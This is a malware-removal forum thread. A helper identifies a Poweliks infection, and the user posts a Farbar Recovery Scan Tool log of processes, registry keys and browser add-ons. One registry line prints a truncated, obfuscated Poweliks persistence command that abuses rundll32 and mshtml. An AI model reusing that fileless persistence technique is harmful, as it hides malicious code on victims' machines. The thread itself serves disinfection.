2014-07-22 02:52:28 2560 ----a-w- c:\windows\system32\drivers\zh-cn\wdf01000.sys.mui
2014-07-22 02:52:27 9728 ----a-w- c:\windows\system32\Wdfres.dll
2014-07-22 02:52:27 47720 ----a-w- c:\windows\system32\drivers\WdfLdr.sys
2014-07-22 02:52:27 16896 ----a-w- c:\windows\system32\winusb.dll
2014-07-22 02:52:26 73216 ----a-w- c:\windows\system32\WUDFSvc.dll
2014-07-22 02:52:26 66560 ----a-w- c:\windows\system32\drivers\WUDFPf.sys
2014-07-22 02:52:26 613888 ----a-w- c:\windows\system32\WUDFx.dll
2014-07-22 02:52:26 38912 ----a-w- c:\windows\system32\WUDFCoinstaller.dll
2014-07-22 02:52:26 196608 ----a-w- c:\windows\system32\WUDFHost.exe
2014-07-22 02:52:26 172032 ----a-w- c:\windows\system32\WUDFPlatform.dll
2014-07-22 02:52:26 155136 ----a-w- c:\windows\system32\drivers\WUDFRd.sys
2014-07-22 02:49:58 347136 ----a-w- c:\windows\system32\RMActivate_ssp.exe
2014-07-22 02:49:58 332288 ----a-w- c:\windows\system32\msdrm.dll
2014-07-22 02:49:58 152576 ----a-w- c:\windows\system32\secproc_ssp_isv.dll
2014-07-22 02:49:58 152064 ----a-w- c:\windows\system32\secproc_ssp.dll
2014-07-22 02:49:57 526336 ----a-w- c:\windows\system32\RMActivate_isv.exe
2014-07-22 02:49:57 518144 ----a-w- c:\windows\system32\RMActivate.exe
2014-07-22 02:49:57 471552 ----a-w- c:\windows\system32\secproc_isv.dll
2014-07-22 02:49:57 471552 ----a-w- c:\windows\system32\secproc.dll
2014-07-22 02:49:57 346624 ----a-w- c:\windows\system32\RMActivate_ssp_isv.exe
2014-07-22 00:56:58 245760 ----a-w- c:\windows\system32\uninst_saver.exe
2014-07-20 18:44:45 83304 ----a-w- c:\windows\system32\drivers\ksapi.sys
2014-07-20 18:44:44 27240 ----a-w- c:\windows\system32\drivers\KavBootC.sys
2014-07-14 13:22:28 97648 ----a-w- c:\windows\system32\drivers\avgntflt.sys
2014-07-02 16:07:08 358984 ----a-w- c:\windows\system32\drivers\Lsmon.sys
2014-07-02 16:07:08 358984 ----a-w- c:\windows\system32\drivers\Drmon.sys
.
============= FINISH: 13:40:03.96 ===============
 

 

 



BC AdBot (Login to Remove)

 


#2 aharonov

aharonov

  • Malware Response Team
  • 2,441 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:02:34 PM

Posted 15 September 2014 - 04:06 PM

Hello,

thank you for your detailed description. This clearly is Poweliks - an infection that we know well.
Please run a FRST scan:


Please download Farbar Recovery Scan Tool and save it to your Desktop.
(If you are not sure which version (32-/64-bit) applies to your system, download and try to start both of them as just the right one will run.)
  • Start FRST with administator privileges.
  • Make sure the option Addition.txt is checked and press the Scan button.
  • When finished, FRST will produce two logs (FRST.txt and Addition.txt) in the same directory the tool was run from.
  • Please copy and paste these logs in your next reply.


#3 firzenj

firzenj
  • Topic Starter

  • Members
  • 6 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:07:34 AM

Posted 15 September 2014 - 04:24 PM

Thanks  for your patience!

 

You can call me Jay, and I realize that I might have done a bunch of stupid actions before asking for your help,I hope unadvised scanning will not cause further chaos for you....

 

And here are the logs:

 

FRST.txt:

 

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 12-09-2014
Ran by THINK (administrator) on THINK-PC on 15-09-2014 17:13:48
Running from C:\Users\THINK\Desktop
Platform: Microsoft® Windows Vista™ Business  Service Pack 2 (X86) OS Language: 中文(简体,中国)
Internet Explorer Version 9
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Lenovo.) C:\Windows\System32\ibmpmsvc.exe
(AMD) C:\Windows\System32\atiesrxx.exe
(Microsoft Corporation) C:\Windows\System32\SLsvc.exe
(AMD) C:\Windows\System32\atieclxx.exe
() Q:\Program Files\Keniu\ConewRsc\conewrsc.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Avira Operations GmbH & Co. KG) C:\Program Files\Avira\AntiVir Desktop\sched.exe
(IObit) C:\Program Files\IObit\IObit Malware Fighter\IMFsrv.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Broadcom Corporation.) C:\Program Files\ThinkPad\Bluetooth Software\btwdins.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe
(O&O Software GmbH) C:\Program Files\OO Software\Defrag\oodag.exe
(Pharos Systems International) C:\Program Files\PharosSystems\Core\CTskMstr.exe
(Lenovo) C:\Program Files\ThinkPad\Utilities\PWMDBSVC.exe
(Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
(Lenovo) C:\Program Files\Lenovo\Client Security Solution\tvttcsd.exe
() C:\Program Files\Lenovo\Rescue and Recovery\rrpservice.exe
(Lenovo Group Limited) C:\Program Files\Common Files\Lenovo\Scheduler\tvtsched.exe
(Conexant Systems, Inc.) C:\Windows\System32\drivers\XAudio.exe
(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
(Microsoft Corporation) C:\Windows\System32\wbem\unsecapp.exe
(Avira Operations GmbH & Co. KG) C:\Program Files\Avira\AntiVir Desktop\avwebgrd.exe
(Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(Avira Operations GmbH & Co. KG) C:\Program Files\Avira\AntiVir Desktop\avgnt.exe
(Broadcom Corporation.) C:\Program Files\ThinkPad\Bluetooth Software\BTTray.exe
(Microsoft Corporation) C:\Windows\System32\conime.exe
(Lenovo Group Limited) C:\Program Files\Common Files\Lenovo\tvt_reg_monitor_svc.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\Rescue and Recovery\rrservice.exe
(Sysinternals - www.sysinternals.com) C:\Users\THINK\Desktop\procexp_V15.40.0.0.4202571463.exe
(Sogou.com Inc.) Q:\Program Files\SogouInput\6.1.0.6700\SogouInput\Components\AddressSearch\1.0.0.1255\SGImeGuard.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Sogou.com Inc.) Q:\Program Files\SogouInput\6.1.0.6700\SogouInput\7.2.0.2991\SogouCloud.exe
(Malwarebytes Corporation) C:\Program Files\Malwarebytes Anti-Malware\mbam.exe
(Malwarebytes Corporation) C:\Program Files\Malwarebytes Anti-Malware\mbamservice.exe
(Malwarebytes Corporation) C:\Program Files\Malwarebytes Anti-Malware\mbamscheduler.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Nullsoft, Inc.) Q:\Program Files\Winamp\winamp.exe
(Last.fm) Q:\Program Files\Last.fm\Last.fm Scrobbler.exe
(vista123.com) Q:\Program Files\VistaMaster\MemoryMaster.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Farbar) C:\Users\THINK\Desktop\FRST (1).exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [avgnt] => C:\Program Files\Avira\AntiVir Desktop\avgnt.exe [751184 2014-07-23] (Avira Operations GmbH & Co. KG)
HKLM\...\Policies\Explorer: [EnableShellExecuteHooks] 1
HKLM\...\Policies\Explorer: [OldEnableShellExecuteHooks] 1
HKU\S-1-5-21-55330172-1766457534-1491637609-1000\...\Run: [Adobe Acrobat Synchronizer] => Q:\Program Files\Adobe.Acrobat.X.Pro\Acrobat\AdobeCollabSync.exe [1216416 2010-11-15] (Adobe Systems Incorporated)
HKU\S-1-5-21-55330172-1766457534-1491637609-1000\...\Run: [360sd] => Q:\Program Files\360\360sd\360sdrun.exe [832840 2014-05-27] (360.cn)
HKU\S-1-5-21-55330172-1766457534-1491637609-1000\...\Run: [HP Officejet Pro 8600 (NET)] => C:\Program Files\HP\HP Officejet Pro 8600\Bin\ScanToPCActivationApp.exe [1837672 2012-10-17] (Hewlett-Packard Co.)
HKU\S-1-5-21-55330172-1766457534-1491637609-1000\...\Run: [ctfmon] => C:\windows\system32\ctfmon.exe [8704 2006-11-02] (Microsoft Corporation)
HKU\S-1-5-21-55330172-1766457534-1491637609-1000\...\Policies\Explorer: [NolowDiskSpaceChecks] 1
HKU\S-1-5-21-55330172-1766457534-1491637609-1000\...\Policies\Explorer: [AlwaysShowClassicMenu] 0
HKU\S-1-5-21-55330172-1766457534-1491637609-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
HKU\S-1-5-21-55330172-1766457534-1491637609-500\...\Run: [LightScribe Control Panel] => C:\Program Files\Common Files\LightScribe\LightScribeControlPanel.exe [455968 2007-10-18] (Hewlett-Packard Company)
Lsa: [Notification Packages] scecli ACGina
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Bluetooth.lnk
ShortcutTarget: Bluetooth.lnk -> C:\Program Files\ThinkPad\Bluetooth Software\BTTray.exe (Broadcom Corporation.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\STK02N 2.3 PNP Monitor.lnk
ShortcutTarget: STK02N 2.3 PNP Monitor.lnk -> C:\Windows\STK02N\STK02NM.exe (Syntek Ltd.)
Startup: C:\Users\THINK\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\监视墨水警告 - HP Officejet Pro 8600 (网络).lnk
ShortcutTarget: 监视墨水警告 - HP Officejet Pro 8600 (网络).lnk -> C:\Program Files\HP\HP Officejet Pro 8600\Bin\HPStatusBL.dll (Hewlett-Packard Co.)
ShellIconOverlayIdentifiers: 360FileGuardAntiDel -> {130DA40A-D640-44D7-9CC6-FAA1CD6B3DEA} => Q:\Program Files\360\360sd\ShellIco.dll (360.cn)
ShellIconOverlayIdentifiers: AAADesktopTips -> {4562B511-62E9-4533-B7B2-56A8BB10B482} => C:\Users\Public\Thunder Network\KanKan\reghelper\xappex.1.1.1.73.(426).dll (深圳市迅雷网络技术有限公司)
ShellIconOverlayIdentifiers: DropboxExt1 -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\THINK\AppData\Roaming\Dropbox\bin\DropboxExt.19.dll (Dropbox, Inc.)
ShellIconOverlayIdentifiers: DropboxExt2 -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\THINK\AppData\Roaming\Dropbox\bin\DropboxExt.19.dll (Dropbox, Inc.)
ShellIconOverlayIdentifiers: DropboxExt3 -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\THINK\AppData\Roaming\Dropbox\bin\DropboxExt.19.dll (Dropbox, Inc.)
ShellIconOverlayIdentifiers: DropboxExt4 -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\THINK\AppData\Roaming\Dropbox\bin\DropboxExt.19.dll (Dropbox, Inc.)
ShellIconOverlayIdentifiers: QVODOverlayIcon -> {237A913F-9059-4E00-8C29-624C3C015013} => C:\Program Files\QMovie\QVODShellIcon.dll (Shenzhen Qvod Technology Co.,Ltd)
BootExecute: autocheck autochk * OODBS
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.hao123.com/?tn=91192494_hao_pg
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Secondary_Page_URL = http://www.lenovo.com/welcome/thinkpad
HKCU\Software\Microsoft\Internet Explorer\Main,Start Pages = http://www.baidu.com/index.php?tn=antiarp_pg
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.hao123.com/?tn=91192494_hao_pg
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Microsoft\Internet Explorer\Main,Start Pages = http://www.baidu.com/index.php?tn=antiarp_pg
SearchScopes: HKLM - DefaultScope {0E7B197B-A3DE-4FD4-A19A-1EECF791D16F} URL = http://www.baidu.com/s?tn=msvista_dg&ch=6&ie=utf-8&word={searchTerms}
SearchScopes: HKLM - PrevScope {0E7B197B-A3DE-4FD4-A19A-1EECF791D16F}
SearchScopes: HKLM - {0E7B197B-A3DE-4FD4-A19A-1EECF791D16F} URL = http://www.baidu.com/s?tn=msvista_dg&ch=6&ie=utf-8&word={searchTerms}
SearchScopes: HKCU - DefaultScope {B8E20CD7-BAC2-4820-9AA6-1060B3AF25E2} URL = http://www.baidu.com/s?tn=msvista_dg&ch=6&ie=utf-8&word={searchTerms}
SearchScopes: HKCU - PrevScope {B8E20CD7-BAC2-4820-9AA6-1060B3AF25E2}
SearchScopes: HKCU - {0E7B197B-A3DE-4FD4-A19A-1EECF791D16F} URL = http://www.baidu.com/s?tn=msvista_dg&ch=6&ie=utf-8&word={searchTerms}
SearchScopes: HKCU - {11111111-1111-1111-1111-111111111111} URL = http://www.baidu.com/s?tn=msvista_dg&ch=6&ie=utf-8&word={searchTerms}
SearchScopes: HKCU - {24588FA4-10F1-41D7-B19D-6E22361E47FA} URL = http://www.baidu.com/s?tn=msvista_dg&ch=6&ie=utf-8&word={searchTerms}
SearchScopes: HKCU - {B8E20CD7-BAC2-4820-9AA6-1060B3AF25E2} URL = http://www.baidu.com/s?tn=msvista_dg&ch=6&ie=utf-8&word={searchTerms}
SearchScopes: HKCU - {DAFC3089-C966-4796-BF72-E6BB9C4BB8E5} URL = http://www.google.cn/search?q={searchTerms}&client=aff-6655&hl=zh-CN&channel=vm
SearchScopes: HKCU - {E19077BB-3ADE-4DF4-1A9A-C1EDEF11679F} URL = http://www.sogou.com/sogou?query={searchTerms}&ie=utf8&pid=sogou-clse-c07d4fe1bad8cc10
BHO: QQDownload IE Left Helper -> {00000000-12C9-4305-82F9-43058F20E8D2} -> Q:\Program Files\Tencent\QQDownload\QQIEHelper01.dll (Tencent Technology (Shenzhen) Company Limited)
BHO: IE2EMBHO Class -> {0A0DDBD3-6641-40B9-873F-BBDD26D6C14E} -> Q:\Program Files\easyMule\modules\IE2EM.dll (VeryCD.com)
BHO: 360sdbho Class -> {0F4BF955-A127-41B7-A998-369904AA2578} -> Q:\Program Files\360\360sd\360sdbho.dll (360.cn)
BHO: ExplorerWnd Helper -> {10921475-03CE-4E04-90CE-E2E7EF20C814} -> q:\Program Files\IObit\IObit Uninstaller\UninstallExplorer32.dll (IObit)
BHO: Bing Bar Helper -> {1dad3af3-ef2f-4f64-ac4b-11789189fcb6} -> C:\Program Files\Microsoft\BingBar\7.2.241.0\BingExt.dll (Microsoft Corporation。)
BHO: WebDetectorBHO Class -> {43BEAFD9-E005-483D-A367-146BA6C8A32E} -> q:\Program Files\Tudou\飞速Tudou\tudouDetector.dll (土豆网)
BHO: No Name -> {5C255C8A-E604-49b4-9D64-90988571CECB} ->  No File
BHO: xiamistart Class -> {658D2C4F-158A-46FB-8C96-B1C8F56DBBE9} -> H:\shark\XIAMIP~1.DLL (XiaMi music)
BHO: BOC ProcessProtect Class -> {776B71E2-B4CC-4C94-BC7C-09103AA690B6} -> C:\Windows\system32\ProcessProtection.dll (www.ISRA.org.cn)
BHO: 迅雷下载支持 -> {889D2FEB-5411-4565-8998-1DD2C5261283} -> Q:\Program Files\Thunder Network\Thunder\BHO\XunleiBHO7.99.9.172.dll (深圳市迅雷网络技术有限公司)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corporation)
BHO: No Name -> {B164E929-A1B6-4A06-B104-2CD0E90A88FF} ->  No File
BHO: Advanced SystemCare Browser Protection -> {BA0C978D-D909-49B6-AFE2-8BDE245DC7E6} -> C:\Program Files\IObit\Surfing Protection\BrowerProtect\ASCPlugin_Protection.dll (IObit)
BHO: AccountProtectBHO Class -> {DDD362CF-523B-4BC9-8FDC-58F93B6BC945} -> C:\Users\THINK\AppData\Roaming\Tencent\QQ\QQAntiPhishing\AccountProtect.dll (Tencent)
BHO: 迅雷下载支持组件 -> {DE05CF4A-7B0A-4775-B5E5-396244938679} -> Q:\Program Files\Thunder Network\Thunder\Thunder BHO Platform\np_tdieplat.dll (深圳市迅雷网络技术有限公司)
BHO: BHOImpl Class -> {E1499FE7-129D-4B6E-B681-DDF21E14172C} -> C:\Users\THINK\Documents\iTools\Plugin\iToolsBHO.dll (iTools.hk)
Toolbar: HKLM - Bing Bar - {eec0f710-38b5-4aba-99bf-ec87564a4e13} - C:\Program Files\Microsoft\BingBar\7.2.241.0\BingExt.dll (Microsoft Corporation。)
Toolbar: HKCU - No Name - {BDAD1DAD-C946-4A17-ADC1-64B5B4FF55D0} -  No File
Toolbar: HKCU - No Name - {21FA44EF-376D-4D53-9B0F-8A89D3229068} -  No File
DPF: {02BCC737-B171-4746-94C9-0D8A0B2C0089} http://office.microsoft.com/sites/production/ieawsdc32.cab
DPF: {2B24B8F5-8FAD-4933-8E6C-3CAAEEA4D217} http://8021x.noc.stonybrook.edu/tools/xc_loader_activex.ocx
DPF: {45D2E7C0-B894-43CE-B64E-F210DBEC8C94} http://www.activextest.com/activex/ActiveXScanner.CAB
DPF: {9732FB42-C321-11D1-836F-00A0C993F125} http://mheller.com/mhLbl.cab
DPF: {9E2CD2C3-4DDA-4473-B904-B8E6D0DBAB86} http://think.lenovo.com.cn/ThinkEDriver/cab/npdueng.cab
DPF: {BBF51028-5890-4817-A2C4-5F3CFCEBD7EF} http://8021x.noc.stonybrook.edu/tools/xc_loader_activex.ocx
Handler: KuGoo - {6AC4FBC7-AA38-45EC-9634-D6D20B679EFC} - Q:\Program Files\KuGou7\KuGoo3DownXControl.ocx (广州酷狗计算机科技有限公司)
Handler: KuGoo3 - {6AC4FBC7-AA38-45EC-9634-D6D20B679EFC} - Q:\Program Files\KuGou7\KuGoo3DownXControl.ocx (广州酷狗计算机科技有限公司)
Handler: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files\Windows Live\Messenger\msgrapp.14.0.8117.0416.dll (Microsoft Corporation)
Handler: ms-itss - No CLSID Value - 
Handler: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files\Windows Live\Messenger\msgrapp.14.0.8117.0416.dll (Microsoft Corporation)
Handler: sacore - No CLSID Value - 
ShellExecuteHooks:  - {AEB6717E-7E19-11d0-97EE-00C04FD91972} -  No File [ ]
Winsock: Catalog5 08 C:\Program Files\Bonjour\mdnsNSP.dll [121704] (Apple Inc.)
Tcpip\Parameters: [DhcpNameServer] 167.206.112.138 167.206.7.4 167.206.3.168
 
FireFox:
========
FF Plugin: @56.com/iCan -> q:\Program Files\iCan3\npiCan3plugin.dll (www.56.com)
FF Plugin: @adobe.com/FlashPlayer -> C:\windows\system32\Macromed\Flash\NPSWF32_14_0_0_145.dll ()
FF Plugin: @alipay.com/npaliedit -> C:\windows\system32\aliedit\3.8.0.0\npaliedit.dll No File
FF Plugin: @Apple.com/iTunes,version=1.0 -> Q:\Program Files\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin: @baidu.com/BaiduRJDownloaderPlugin -> C:\Users\THINK\AppData\Roaming\baidu\BaiduRJDownloader\1.3.0.3\npBDSoftHelperPlug.dll (百度在线网络技术(北京)有限公司)
FF Plugin: @baidu.com/npxbdsetup -> C:\windows\Downloaded Program Files\375291\npxbdsetup.dll No File
FF Plugin: @baidu.com/YunWebDetectPlugin -> Q:\Program Files\BaiduYunGuanjia\npYunWebDetect.dll (Baidu.com, Inc.)
FF Plugin: @google.com/npPicasa3,version=3.0.0 -> q:\Program Files\Google\Picasa3\npPicasa3.dll (Google, Inc.)
FF Plugin: @IObit.com/np_Asc_Plugin -> C:\Program Files\IObit\Surfing Protection\BrowerProtect\np_Asc_plugin.dll (IObit)
FF Plugin: @iqiyi.com/npclient -> Q:\IQIYI Video\PStyle\npclient.dll No File
FF Plugin: @itools.hk/npiTools, version=1.0.0 -> C:\Users\THINK\Documents\iTools\Plugin\npiTools.dll ()
FF Plugin: @lenovo.com/dueng,version=2.0 -> C:\Windows\system32\lenovo\update\npdueng.dll (Lenovo)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.20125.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeLive,version=1.3 -> C:\Program Files\Microsoft\Office Live\npOLW.dll (Microsoft Corp.)
FF Plugin: @microsoft.com/WPF,version=3.5 -> C:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
FF Plugin: @pptv.com/plugin -> C:\Program Files\Internet Explorer\PPLite\plugin\1.0.1.1058\npplugin2.dll (PPLive Corporation)
FF Plugin: @qq.com/npqscall -> C:\Program Files\Common Files\Tencent\Npchrome\npactivex.dll (Tencent)
FF Plugin: @qq.com/QQDownloadPlugin -> Q:\Program Files\Tencent\QQDownload\Browser\769\npXFPlugin.dll (Tencent Technology (Shenzhen) Company Limited)
FF Plugin: @qq.com/QQPhotoDrawEx -> C:\Program Files\Tencent\Qzone\Ver_247.311\npQQPhotoDrawEx.dll ()
FF Plugin: @qq.com/QzoneMusic -> C:\Program Files\Tencent\QQMusic\QzoneMusic\npQzoneMusic.dll (Tencent)
FF Plugin: @qq.com/TXSSO -> C:\Program Files\Common Files\Tencent\TXSSO\1.2.2.45\Bin\npSSOAxCtrlForPTLogin.dll (Tencent)
FF Plugin: @renren.com/nprralbum -> C:\Program Files\Common Files\renren\rralbum\nprralbum.dll (renren inc)
FF Plugin: @tencent.com/npQQMailWebKit,version=1.0.0.1 -> C:\Program Files\QQMailPlugin\npQQMailWebKit.dll (Tencent)
FF Plugin: @tencent.com/nptxftnWebKit,version=1.0.0.1 -> C:\Program Files\QQMailPlugin\nptxftnWebKit.dll (Tencent Technology (Shenzhen) Company Limited)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: @xunlei.com/DapCtrlPlugin -> C:\Program Files\Common Files\Thunder Network\KanKan\npDapCtrlFirefox.2.0.5901.12.(358).dll (ShenZhen Thunder Networking Technologies Ltd.)
FF Plugin: @xunlei.com/KKVA -> C:\Program Files\Common Files\Thunder Network\KanKan\npKKVA.1.0.0.3.(328).dll (ShenZhen Thunder Networking Technologies Ltd.)
FF Plugin: @xunlei.com/npaplayer -> C:\Users\Public\Thunder Network\APlayer\codecs\npaplayer.dll No File
FF Plugin: @xunlei.com/npxluser -> C:\Program Files\Common Files\Thunder Network\UserAgent\npxluser2.0.2.3.dll (Thunder Networking Technologies,LTD)
FF Plugin: @xunlei.com/npxunlei;version=1.0.0.2 -> Q:\Program Files\Thunder Network\Thunder\Data\npxunlei1.0.0.2.dll ( )
FF Plugin: Adobe Reader -> Q:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: @360.cn/360MMPlugin -> Q:\Program Files\360\360safe\mobilemgr\np360MMPlugIn.dll (360.cn)
FF Plugin HKCU: @alibaba.com/npwangwang;version=1.0 -> Q:\Program Files\AliWangWang\7.00.07C\npwangwang.dll ( )
FF Plugin HKCU: @qvod.com/QvodInsert -> q:\QvodPlayer\npQvodInsert.dll No File
FF Plugin HKCU: @renren.com/nprralbum -> C:\Program Files\Common Files\renren\rralbum\nprralbum.dll (renren inc)
FF Plugin HKCU: @talk.google.com/GoogleTalkPlugin -> C:\Users\THINK\AppData\Roaming\Mozilla\plugins\npgoogletalk.dll (Google)
FF Plugin HKCU: @talk.google.com/O1DPlugin -> C:\Users\THINK\AppData\Roaming\Mozilla\plugins\npo1d.dll (Google)
FF Plugin HKCU: @tools.google.com/Google Update;version=3 -> C:\Users\THINK\AppData\Local\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin HKCU: @tools.google.com/Google Update;version=9 -> C:\Users\THINK\AppData\Local\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin HKCU: @xunlei.com/npxluser -> C:\Program Files\Common Files\Thunder Network\UserAgent\npxluser2.0.2.3.dll (Thunder Networking Technologies,LTD)
FF Plugin HKCU: @xunlei.com/npxunlei;version=1.0.0.2 -> Q:\Program Files\Thunder Network\Thunder\Data\npxunlei1.0.0.2.dll ( )
FF Plugin ProgramFiles/Appdata: C:\Users\THINK\AppData\Roaming\mozilla\plugins\npgoogletalk.dll (Google)
FF Plugin ProgramFiles/Appdata: C:\Users\THINK\AppData\Roaming\mozilla\plugins\npo1d.dll (Google)
FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - C:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: Microsoft .NET Framework Assistant - C:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2009-09-15]
FF HKCU\...\Firefox\Extensions: [dict@www.youdao.com] - Q:\Program Files\Youdao\Dict4\\res\extensions\firefox
FF Extension: Youdao Word Capturer - Q:\Program Files\Youdao\Dict4\\res\extensions\firefox [2011-09-28]
 
Chrome: 
=======
CHR HomePage: Default -> hxxp://www.google.com/
CHR StartupUrls: Default -> "hxxp://www.google.com/", "hxxp://www.hao123.com/?tn=12092018_15_hao_pg", "hxxp://kl.startnow.com/?src=startpage&provider=&provider_name=yahoo&provider_code=&partner_id=693&product_id=876&affiliate_id=&channel=&toolbar_id=200&toolbar_version=2.5.0&install_country=US&install_date=20130505&user_guid=7D280CBB48134A63A7F3008BB7AF6F5A&machine_id=0a8e1d6372ad8a74ad749c75ac89af9c&browser=CR&os=win&os_version=6.0-x86-SP2"
CHR Plugin: (Remoting Viewer) - internal-remoting-viewer
CHR Plugin: (Native Client) - C:\Program Files\Google\Chrome\Application\36.0.1985.125\ppGoogleNaClPluginChrome.dll ()
CHR Plugin: (Chrome PDF Viewer) - C:\Program Files\Google\Chrome\Application\36.0.1985.125\pdf.dll ()
CHR Plugin: (Shockwave Flash) - C:\Program Files\Google\Chrome\Application\36.0.1985.125\gcswf32.dll No File
CHR Plugin: (Shockwave Flash) - C:\Windows\system32\Macromed\Flash\NPSWF32.dll No File
CHR Plugin: (Java Deployment Toolkit 7.0.0.66) - C:\Program Files\Java\jre7\bin\new_plugin\npdeploytk.dll (Sun Microsystems, Inc.)
CHR Plugin: (Java™ Platform SE 7) - C:\Program Files\Java\jre7\bin\new_plugin\npjp2.dll (Sun Microsystems, Inc.)
CHR Plugin: (QuickTime Plug-in 7.6.9) - C:\Program Files\QuickTime\plugins\npqtplugin.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.6.9) - C:\Program Files\QuickTime\plugins\npqtplugin2.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.6.9) - C:\Program Files\QuickTime\plugins\npqtplugin3.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.6.9) - C:\Program Files\QuickTime\plugins\npqtplugin4.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.6.9) - C:\Program Files\QuickTime\plugins\npqtplugin5.dll (Apple Inc.)
CHR Plugin: (QuickTime Plug-in 7.6.9) - C:\Program Files\QuickTime\plugins\npqtplugin6.dll (Apple Inc.)
CHR Plugin: (Microsoft® Windows Media Player Firefox Plugin) - C:\Program Files\Windows Media Player\np-mswmp.dll No File
CHR Plugin: (Google Talk Plugin) - C:\Users\THINK\AppData\Roaming\Mozilla\plugins\npgoogletalk.dll (Google)
CHR Plugin: (Google Talk Plugin Video Accelerator) - C:\Users\THINK\AppData\Roaming\Mozilla\plugins\npgtpo3dautoplugin.dll No File
CHR Plugin: (Adobe Acrobat) - Q:\Program Files\Adobe\Reader 10.0\Reader\Browser\nppdf32.dll (Adobe Systems Inc.)
CHR Plugin: (Thunder DapCtrl Plugin) - C:\Program Files\Common Files\Thunder Network\KanKan\npDapCtrlFirefox.2.0.5901.12.(358).dll (ShenZhen Thunder Networking Technologies Ltd.)
CHR Plugin: (PPLive PPTV Plugin) - C:\Program Files\Internet Explorer\PPLite\plugin\npplugin2.dll No File
CHR Plugin: (Silverlight Plug-In) - C:\Program Files\Microsoft Silverlight\4.0.60831.0\npctrl.dll No File
CHR Plugin: (Microsoft Office Live Plug-in for Firefox) - C:\Program Files\Microsoft\Office Live\npOLW.dll (Microsoft Corp.)
CHR Plugin: (Google Update) - C:\Users\THINK\AppData\Local\Google\Update\1.3.21.79\npGoogleUpdate3.dll No File
CHR Plugin: (npalicdo plugin) - C:\Users\THINK\AppData\Roaming\alipay\cf\npalicdo.dll No File
CHR Plugin: (AliWangWang Plug-In For Firefox and Netscape) - Q:\Program Files\AliWangWang\7.00.07C\npwangwang.dll ( )
